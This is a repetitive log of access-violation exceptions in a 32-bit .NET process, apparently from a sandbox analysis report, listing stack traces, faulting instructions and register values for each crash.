__exception__ May 2, 2022, 8:57 a.m.	stacktrace: 0x8c0567 0x8c0308 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72ad74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72ad7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72b61dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72b61e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72b61f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72b6416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f1f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74317f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74314de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8c06a9 registers.esp: 3403988 registers.edi: 36719672 registers.eax: 0 registers.ebp: 3404028 registers.edx: 195 registers.ebx: 3404316 registers.esi: 36724360 registers.ecx: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: mscorlib+0x30c9ff @ 0x71d5c9ff mscorlib+0x302367 @ 0x71d52367 mscorlib+0x3022a6 @ 0x71d522a6 mscorlib+0x302261 @ 0x71d52261 mscorlib+0x30ca7c @ 0x71d5ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 8b 48 04 39 09 e8 4c 3b 96 70 85 c0 0f 8e 73 ff exception.instruction: mov ecx, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8c435a registers.esp: 95088796 registers.edi: 95088908 registers.eax: 0 registers.ebp: 95088832 registers.edx: 6642872 registers.ebx: 36719548 registers.esi: 36719528 registers.ecx: 1924926809	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: 0x8c4680 mscorlib+0x30c9ff @ 0x71d5c9ff mscorlib+0x302367 @ 0x71d52367 mscorlib+0x3022a6 @ 0x71d522a6 mscorlib+0x302261 @ 0x71d52261 mscorlib+0x30ca7c @ 0x71d5ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 39 09 e8 ef 50 96 70 eb 11 8b c8 e8 56 ef 98 72 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8c46ca registers.esp: 95088748 registers.edi: 95088772 registers.eax: 0 registers.ebp: 95088788 registers.edx: 6642872 registers.ebx: 36719548 registers.esi: 36719528 registers.ecx: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: 0x8c4680 mscorlib+0x30c9ff @ 0x71d5c9ff mscorlib+0x302367 @ 0x71d52367 mscorlib+0x3022a6 @ 0x71d522a6 mscorlib+0x302261 @ 0x71d52261 mscorlib+0x30ca7c @ 0x71d5ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 8b 01 8b 40 28 ff 50 1c eb 11 8b c8 e8 35 ef 98 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8c46ea registers.esp: 95088748 registers.edi: 95088772 registers.eax: 95088748 registers.ebp: 95088788 registers.edx: 9193188 registers.ebx: 36719548 registers.esi: 36719528 registers.ecx: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: 0x8c4680 mscorlib+0x30c9ff @ 0x71d5c9ff mscorlib+0x302367 @ 0x71d52367 mscorlib+0x3022a6 @ 0x71d522a6 mscorlib+0x302261 @ 0x71d52261 mscorlib+0x30ca7c @ 0x71d5ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 8b 01 8b 40 30 ff 50 10 eb 11 8b c8 e8 14 ef 98 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8c470b registers.esp: 95088748 registers.edi: 95088772 registers.eax: 95088748 registers.ebp: 95088788 registers.edx: 9193221 registers.ebx: 36719548 registers.esi: 36719528 registers.ecx: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: 0x8c0567 0x8c4eea 0x8c4e51 0x8c3ab4 mscorlib+0x30c9ff @ 0x71d5c9ff mscorlib+0x302367 @ 0x71d52367 mscorlib+0x3022a6 @ 0x71d522a6 mscorlib+0x302261 @ 0x71d52261 mscorlib+0x30ca7c @ 0x71d5ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8c06a9 registers.esp: 97971840 registers.edi: 36719672 registers.eax: 0 registers.ebp: 97971880 registers.edx: 195 registers.ebx: 36831240 registers.esi: 36837912 registers.ecx: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: 0x8c0567 0x8c4f75 0x8c4e72 0x8c3ab4 mscorlib+0x30c9ff @ 0x71d5c9ff mscorlib+0x302367 @ 0x71d52367 mscorlib+0x3022a6 @ 0x71d522a6 mscorlib+0x302261 @ 0x71d52261 mscorlib+0x30ca7c @ 0x71d5ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8c06a9 registers.esp: 97971836 registers.edi: 36719672 registers.eax: 0 registers.ebp: 97971876 registers.edx: 195 registers.ebx: 36831428 registers.esi: 37307384 registers.ecx: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: 0x8c0567 0x8c4eea 0x8c50c0 0x8c3add mscorlib+0x30c9ff @ 0x71d5c9ff mscorlib+0x302367 @ 0x71d52367 mscorlib+0x3022a6 @ 0x71d522a6 mscorlib+0x302261 @ 0x71d52261 mscorlib+0x30ca7c @ 0x71d5ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8c06a9 registers.esp: 97971840 registers.edi: 36719672 registers.eax: 0 registers.ebp: 97971880 registers.edx: 195 registers.ebx: 36831356 registers.esi: 37342656 registers.ecx: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: 0x8c0567 0x8c4f75 0x8c50e0 0x8c3add mscorlib+0x30c9ff @ 0x71d5c9ff mscorlib+0x302367 @ 0x71d52367 mscorlib+0x3022a6 @ 0x71d522a6 mscorlib+0x302261 @ 0x71d52261 mscorlib+0x30ca7c @ 0x71d5ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8c06a9 registers.esp: 97971836 registers.edi: 36719672 registers.eax: 0 registers.ebp: 97971876 registers.edx: 195 registers.ebx: 36856460 registers.esi: 37377576 registers.ecx: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: 0x8c0567 0x8c4eea 0x8c50eb 0x8c3add mscorlib+0x30c9ff @ 0x71d5c9ff mscorlib+0x302367 @ 0x71d52367 mscorlib+0x3022a6 @ 0x71d522a6 mscorlib+0x302261 @ 0x71d52261 mscorlib+0x30ca7c @ 0x71d5ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8c06a9 registers.esp: 97971840 registers.edi: 36719672 registers.eax: 0 registers.ebp: 97971880 registers.edx: 195 registers.ebx: 36831356 registers.esi: 37412532 registers.ecx: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: 0x8c4680 mscorlib+0x30c9ff @ 0x71d5c9ff mscorlib+0x302367 @ 0x71d52367 mscorlib+0x3022a6 @ 0x71d522a6 mscorlib+0x302261 @ 0x71d52261 mscorlib+0x30ca7c @ 0x71d5ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 8b 01 8b 40 28 ff 50 1c eb 11 8b c8 e8 35 ef 98 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8c46ea registers.esp: 95088748 registers.edi: 95088772 registers.eax: 0 registers.ebp: 95088788 registers.edx: 1093 registers.ebx: 36719548 registers.esi: 36719528 registers.ecx: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: 0x8c4680 mscorlib+0x30c9ff @ 0x71d5c9ff mscorlib+0x302367 @ 0x71d52367 mscorlib+0x3022a6 @ 0x71d522a6 mscorlib+0x302261 @ 0x71d52261 mscorlib+0x30ca7c @ 0x71d5ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 8b 01 8b 40 30 ff 50 10 eb 11 8b c8 e8 14 ef 98 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8c470b registers.esp: 95088748 registers.edi: 95088772 registers.eax: 95088748 registers.ebp: 95088788 registers.edx: 9193221 registers.ebx: 36719548 registers.esi: 36719528 registers.ecx: 0	1
__exception__ May 2, 2022, 8:58 a.m.	stacktrace: 0x8c4680 mscorlib+0x30c9ff @ 0x71d5c9ff mscorlib+0x302367 @ 0x71d52367 mscorlib+0x3022a6 @ 0x71d522a6 mscorlib+0x302261 @ 0x71d52261 mscorlib+0x30ca7c @ 0x71d5ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 8b 01 8b 40 28 ff 50 1c eb 11 8b c8 e8 35 ef 98 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8c46ea registers.esp: 95088748 registers.edi: 95088772 registers.eax: 0 registers.ebp: 95088788 registers.edx: 1093 registers.ebx: 36719548 registers.esi: 36719528 registers.ecx: 0	1
__exception__ May 2, 2022, 8:58 a.m.	stacktrace: 0x8c4680 mscorlib+0x30c9ff @ 0x71d5c9ff mscorlib+0x302367 @ 0x71d52367 mscorlib+0x3022a6 @ 0x71d522a6 mscorlib+0x302261 @ 0x71d52261 mscorlib+0x30ca7c @ 0x71d5ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 8b 01 8b 40 30 ff 50 10 eb 11 8b c8 e8 14 ef 98 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8c470b registers.esp: 95088748 registers.edi: 95088772 registers.eax: 95088748 registers.ebp: 95088788 registers.edx: 9193221 